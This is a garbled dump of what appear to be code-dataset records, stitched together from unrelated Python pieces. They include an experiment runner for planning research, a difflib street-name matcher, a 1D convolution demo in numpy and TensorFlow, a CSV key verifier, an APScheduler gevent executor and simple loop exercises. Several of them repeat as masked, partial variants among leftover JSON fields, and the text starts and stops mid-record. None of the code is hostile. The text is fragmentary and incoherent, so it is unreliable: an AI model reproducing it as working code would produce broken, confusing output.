SpecificationGenerator().generate(gen_our_best)\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n print(\n f'Expt {name}:\\t{len(specifications) / num_seeds} specs to run, over {num_seeds} seeds'\n )\n for spec in specifications:\n if spec['seed'] == 0:\n print(spec)\n runner = ExperimentRunner()\n map_memory(base_specs['file'], base_specs['state_space_dimensionality'])\n DEBUG = False\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=True, specification_runner=MainRunner(),\n use_dashboard=False, force_pickle=True, context_type='fork')\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=False, specification_runner=\n MultiprocessingRunner(), context_type='fork', use_dashboard=\n True, force_pickle=True)\n",
"step-5": "import logging\nimport os\nfrom os.path import exists, abspath, join, dirname\nfrom os import mkdir\nos.environ[\"MKL_NUM_THREADS\"] = \"1\"\nos.environ[\"MP_NUM_THREADS\"] = \"1\"\n\nfrom smallab.runner_implementations.multiprocessing_runner import MultiprocessingRunner\n\nfrom plannin_experiment import PlanningExperiment\n\nmpl_logger = logging.getLogger('matplotlib')\nmpl_logger.setLevel(logging.WARNING)\nlogging.getLogger(\"smallab\").propogate = False\n\nfrom smallab.specification_generator import SpecificationGenerator\nfrom smallab.runner.runner import ExperimentRunner\nfrom smallab.runner_implementations.main_process_runner import MainRunner\nfrom itertools import product\nfrom sample_sim.memory_mapper_utility import map_memory\nfrom smallab.file_locations import get_experiment_save_directory\nimport sys\nimport numpy as np\n\nif __name__ == '__main__':\n if \"experiments\" in os.getcwd():\n os.chdir(\"../..\")\n\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n\n\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = \"IPP_POMCP\"\n num_seeds = 5\n num_steps = 200\n base_specs = {\n \"plot\": False,\n \"file\": [\"fn:sbo\"],\n \"seed\": list(range(num_seeds)),\n \"objective_c\": 10, # 10 for sbo, 100 for validation envs\n \"state_space_dimensionality\": [[50,50,200]], # for fn:sbo, [[62, 70, 5]], # for validation envs\n \"rollout_number_goal\": [num_steps * 150], # z_steps * 150\n \"alpha_param\": 6,\n \"beta_param\": 1,\n \"epsilon\": 10,\n \"delta\": 0.1,\n \"sample_observations\": False,\n \"use_expected_improvement\": False,\n \"planning_steps\": [num_steps],\n }\n\n gen_baseline = base_specs.copy()\n gen_baseline.update({\n \"plan_commitment_algorithm\": \"n_steps\",\n \"plan_threshold\": [1],\n \"rollout_allocation_method\": [\"fixed\"],\n \"waste_unused_rollouts\": [False],\n })\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n\n gen_our_best = base_specs.copy()\n gen_our_best.update({\n \"plan_commitment_algorithm\":\"tTest\",\n \"plan_threshold\":[0.05],\n \"rollout_allocation_method\": [\"beta-ugapeb\"],\n \"waste_unused_rollouts\": [True],\n })\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n\n print(f\"Expt {name}:\\t{len(specifications)/num_seeds} specs to run, over {num_seeds} seeds\")\n for spec in specifications:\n if spec[\"seed\"] == 0:\n print(spec)\n\n runner = ExperimentRunner()\n map_memory(base_specs[\"file\"], base_specs[\"state_space_dimensionality\"])\n DEBUG = False\n\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=True,\n specification_runner=MainRunner(), use_dashboard=False, force_pickle=True, context_type=\"fork\")\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=False,\n specification_runner=MultiprocessingRunner(), context_type=\"fork\", use_dashboard=True,\n force_pickle=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
<|reserved_special_token_0|>
f.readline()
<|reserved_special_token_0|>
for name in names:
if similar(name[:-1].lower(), naam.lower()) > 0.7:
sim = similar(name[:-1].lower(), naam.lower())
print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
naam = 'straat'
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
f = open('straten.txt', 'r')
f.readline()
names = f.readlines()
for name in names:
if similar(name[:-1].lower(), naam.lower()) > 0.7:
sim = similar(name[:-1].lower(), naam.lower())
print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))
<|reserved_special_token_1|>
from difflib import SequenceMatcher
import csv
naam = 'straat'
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
f = open('straten.txt', 'r')
f.readline()
names = f.readlines()
for name in names:
if similar(name[:-1].lower(), naam.lower()) > 0.7:
sim = similar(name[:-1].lower(), naam.lower())
print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))
<|reserved_special_token_1|>
from difflib import SequenceMatcher
import csv
naam = "straat"
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
f = open("straten.txt", "r")
f.readline()
names = f.readlines()
for name in names:
if similar(name[:-1].lower(),naam.lower()) > 0.7:
sim = similar(name[:-1].lower(),naam.lower())
print("gevonden: " + name[:-1] + " ---- " + naam + " ---- " + str(sim))
# with open('straatnamen.csv') as csvfile:
# reader = csv.DictReader(csvfile)
# for row in reader:
# print(row['straatnaam'])
|
flexible
|
{
"blob_id": "2f1193e3ab5e0527ab5f89141613eddb18b5f61d",
"index": 2787,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\n<mask token>\nf.readline()\n<mask token>\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-3": "<mask token>\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-4": "from difflib import SequenceMatcher\nimport csv\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-5": "from difflib import SequenceMatcher\nimport csv\nnaam = \"straat\"\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\nf = open(\"straten.txt\", \"r\")\nf.readline()\nnames = f.readlines()\n\nfor name in names:\n if similar(name[:-1].lower(),naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(),naam.lower())\n print(\"gevonden: \" + name[:-1] + \" ---- \" + naam + \" ---- \" + str(sim))\n\n\n\n\n# with open('straatnamen.csv') as csvfile:\n# reader = csv.DictReader(csvfile)\n# for row in reader:\n# print(row['straatnaam'])\n\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
<|reserved_special_token_0|>
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
<|reserved_special_token_0|>
print(i, '\n', k, '\n')
<|reserved_special_token_0|>
print(data, '\n', kernel, '\n')
<|reserved_special_token_0|>
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
x = [1, 0, 2, 3, 0, 1, 1]
w = [2, 1, 3]
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
<|reserved_special_token_0|>
i = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')
k = tf.constant([2, 1, 3], dtype=tf.float32, name='k')
print(i, '\n', k, '\n')
data = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')
kernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')
print(data, '\n', kernel, '\n')
res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
<|reserved_special_token_1|>
import numpy as np
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
x = [1, 0, 2, 3, 0, 1, 1]
w = [2, 1, 3]
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
import tensorflow as tf
i = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')
k = tf.constant([2, 1, 3], dtype=tf.float32, name='k')
print(i, '\n', k, '\n')
data = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')
kernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')
print(data, '\n', kernel, '\n')
res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
<|reserved_special_token_1|>
# import tensorflow as tf
# from tensorflow.examples.tutorials.mnist import input_data
# mnist = input_data.read_data_sets('/tmp/data/',one_hot=True)
# def build_CNN_clasifier(x):
# x_image = tf.reshape (x, [-1,28,28,1])
#
# #layer1
# w_conv1 = tf.Variable(tf.truncated_normal(shape = [5,5,1,32],stddev= 5e-2))
# b_conv1 = tf.Variable(tf.constant(0.1,shape=[32]))
# h_conv1 = tf.nn.relu(tf.nn.conv2d(x_image,w_conv1,stride=[1,1,1,1,],padding='SAME')+b_conv1)
# h_pool1 = tf.nn.max_pool(h_conv1,ksize=[1,2,2,1],strides = [1,2,2,1],padding='SAME')
#
# #layer2
# w_conv2 = tf.Variable(tf.truncated_normal(shape=[5,5,32,64],stddev = 5e-2))
# b_conv2 = tf.Variable(tf.constant(0.1,shape=[64]))
# h_conv2 = tf.nn.relu(tf.nn.conv2d(h_conv1,w_conv2,strides=[1,1,1,1],padding='SAME')+b_conv2)
#
# h_pool2 = tf.nn.max_pool(h_conv2,ksize=[1,2,2,1],strides= [1,2,2,1],padding='SAME')
#
# #fully-connected layer
# w_fc_1 = tf.Variable(tf.truncated_normal(shape=[7*7*64,1024],stddev=5e-2))
# b_fc_1 = tf.Variable(tf.constant(0.1,shape=[1024]))
# h_pool2_flat= tf.reshape(h_pool2,[-1,7*7*64])
# h_fc_1 = tf.nn.relu(tf.matmul(h_pool2_flat,w_fc_1)+b_fc_1)
#
#
#
#
# with tf.Session() as sess:
# sess.run(x_image, feed_dict={x:mnist})
# print(x_image)
# print(x_image.shape)
import numpy as np
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x)+2*p-len(w))/s)+1):
j = s*i;
res.append(np.sum(x_padded[j:j+w_rot.shape[0]] * w_rot))
return np.array(res)
## Testing:
x = [1, 0, 2, 3, 0, 1, 1]
w = [2, 1, 3]
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
import tensorflow as tf
i = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')
k = tf.constant([2, 1, 3], dtype=tf.float32, name='k')
print(i, '\n', k, '\n')
data = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')
kernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')
print(data, '\n', kernel, '\n')
res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))
#res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'SAME'))
#res = tf.squeeze(tf.nn.conv1d(data, kernel, 2, 'SAME’))
#res = tf.nn.conv1d(data, kernel, 2, 'SAME')
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
|
flexible
|
{
"blob_id": "a336434abc526357db0536955885cf076ee60f59",
"index": 7220,
"step-1": "<mask token>\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\n<mask token>\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\n<mask token>\nprint(i, '\\n', k, '\\n')\n<mask token>\nprint(data, '\\n', kernel, '\\n')\n<mask token>\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))\n",
"step-3": "<mask token>\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\nx = [1, 0, 2, 3, 0, 1, 1]\nw = [2, 1, 3]\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\n<mask token>\ni = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')\nk = tf.constant([2, 1, 3], dtype=tf.float32, name='k')\nprint(i, '\\n', k, '\\n')\ndata = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')\nkernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')\nprint(data, '\\n', kernel, '\\n')\nres = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))\n",
"step-4": "import numpy as np\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\nx = [1, 0, 2, 3, 0, 1, 1]\nw = [2, 1, 3]\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\nimport tensorflow as tf\ni = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')\nk = tf.constant([2, 1, 3], dtype=tf.float32, name='k')\nprint(i, '\\n', k, '\\n')\ndata = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')\nkernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')\nprint(data, '\\n', kernel, '\\n')\nres = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))\n",
"step-5": "# import tensorflow as tf\n\n# from tensorflow.examples.tutorials.mnist import input_data\n# mnist = input_data.read_data_sets('/tmp/data/',one_hot=True)\n# def build_CNN_clasifier(x):\n# x_image = tf.reshape (x, [-1,28,28,1])\n#\n# #layer1\n# w_conv1 = tf.Variable(tf.truncated_normal(shape = [5,5,1,32],stddev= 5e-2))\n# b_conv1 = tf.Variable(tf.constant(0.1,shape=[32]))\n# h_conv1 = tf.nn.relu(tf.nn.conv2d(x_image,w_conv1,stride=[1,1,1,1,],padding='SAME')+b_conv1)\n# h_pool1 = tf.nn.max_pool(h_conv1,ksize=[1,2,2,1],strides = [1,2,2,1],padding='SAME')\n#\n# #layer2\n # w_conv2 = tf.Variable(tf.truncated_normal(shape=[5,5,32,64],stddev = 5e-2))\n # b_conv2 = tf.Variable(tf.constant(0.1,shape=[64]))\n # h_conv2 = tf.nn.relu(tf.nn.conv2d(h_conv1,w_conv2,strides=[1,1,1,1],padding='SAME')+b_conv2)\n #\n # h_pool2 = tf.nn.max_pool(h_conv2,ksize=[1,2,2,1],strides= [1,2,2,1],padding='SAME')\n #\n # #fully-connected layer\n # w_fc_1 = tf.Variable(tf.truncated_normal(shape=[7*7*64,1024],stddev=5e-2))\n # b_fc_1 = tf.Variable(tf.constant(0.1,shape=[1024]))\n # h_pool2_flat= tf.reshape(h_pool2,[-1,7*7*64])\n # h_fc_1 = tf.nn.relu(tf.matmul(h_pool2_flat,w_fc_1)+b_fc_1)\n #\n #\n #\n #\n # with tf.Session() as sess:\n # sess.run(x_image, feed_dict={x:mnist})\n # print(x_image)\n # print(x_image.shape)\n\n\nimport numpy as np\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x)+2*p-len(w))/s)+1):\n j = s*i;\n res.append(np.sum(x_padded[j:j+w_rot.shape[0]] * w_rot))\n\n return np.array(res)\n## Testing:\nx = [1, 0, 2, 3, 0, 1, 1]\nw = [2, 1, 3]\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\n\n\n\n\n\n\nimport tensorflow as tf\ni = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')\nk = tf.constant([2, 1, 3], dtype=tf.float32, name='k')\nprint(i, '\\n', k, '\\n')\ndata = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')\nkernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')\nprint(data, '\\n', kernel, '\\n')\nres = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))\n#res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'SAME'))\n#res = tf.squeeze(tf.nn.conv1d(data, kernel, 2, 'SAME’))\n#res = tf.nn.conv1d(data, kernel, 2, 'SAME')\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
# 키는 첫번째 컬럼에만 설정 가능하다.
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
|
normal
|
{
"blob_id": "eca4abf706fd094a40fdfc8ea483d71b0a018ce9",
"index": 4378,
"step-1": "<mask token>\n\n\nclass ColumnKeyVerifier:\n <mask token>\n <mask token>\n\n def epilogue(self):\n pass\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n <mask token>\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-3": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-4": "import sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-5": "\nimport sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\nclass ColumnKeyVerifier:\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n\n # 키는 첫번째 컬럼에만 설정 가능하다.\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n\n self.keys[key] = True\n\n return True\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class GeventExecutor(BaseExecutor):
<|reserved_special_token_0|>
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError: # pragma: nocover
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self._logger.name).\
link(callback)
|
flexible
|
{
"blob_id": "afcadc11d23fb921eb6f8038a908de02ee763ca4",
"index": 693,
"step-1": "<mask token>\n\n\nclass GeventExecutor(BaseExecutor):\n <mask token>\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-2": "<mask token>\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-3": "<mask token>\ntry:\n import gevent\nexcept ImportError:\n raise ImportError('GeventExecutor requires gevent installed')\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-4": "from __future__ import absolute_import\nimport sys\nfrom apscheduler.executors.base import BaseExecutor, run_job\ntry:\n import gevent\nexcept ImportError:\n raise ImportError('GeventExecutor requires gevent installed')\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-5": "from __future__ import absolute_import\nimport sys\n\nfrom apscheduler.executors.base import BaseExecutor, run_job\n\n\ntry:\n import gevent\nexcept ImportError: # pragma: nocover\n raise ImportError('GeventExecutor requires gevent installed')\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self._logger.name).\\\n link(callback)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
<|reserved_special_token_0|>
if sys.argv[1] == '2':
for x in range(5):
print(str(4 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '3':
for x in range(11):
print(str(15 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '4':
for x in range(11):
print(str(-5 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '5':
for x in range(25, 50):
if x % 2 != 0:
print(x)
for x in range(26):
if x % 2 == 0:
print(str(25 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '6':
for x in range(1, 11):
print(str(x ** 2))
<|reserved_special_token_0|>
if sys.argv[1] == '8':
for x in range(4, 58):
print(x)
days = 57 - x
print('Days remaining to reach 57:', str(days))
<|reserved_special_token_0|>
if sys.argv[1] == '9':
while True:
students = input('Number of students (excluding the girl): ')
jellybeans = input('Number of jelly beans: ')
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print('Please enter an integer for jelly beans and students.')
days = 0
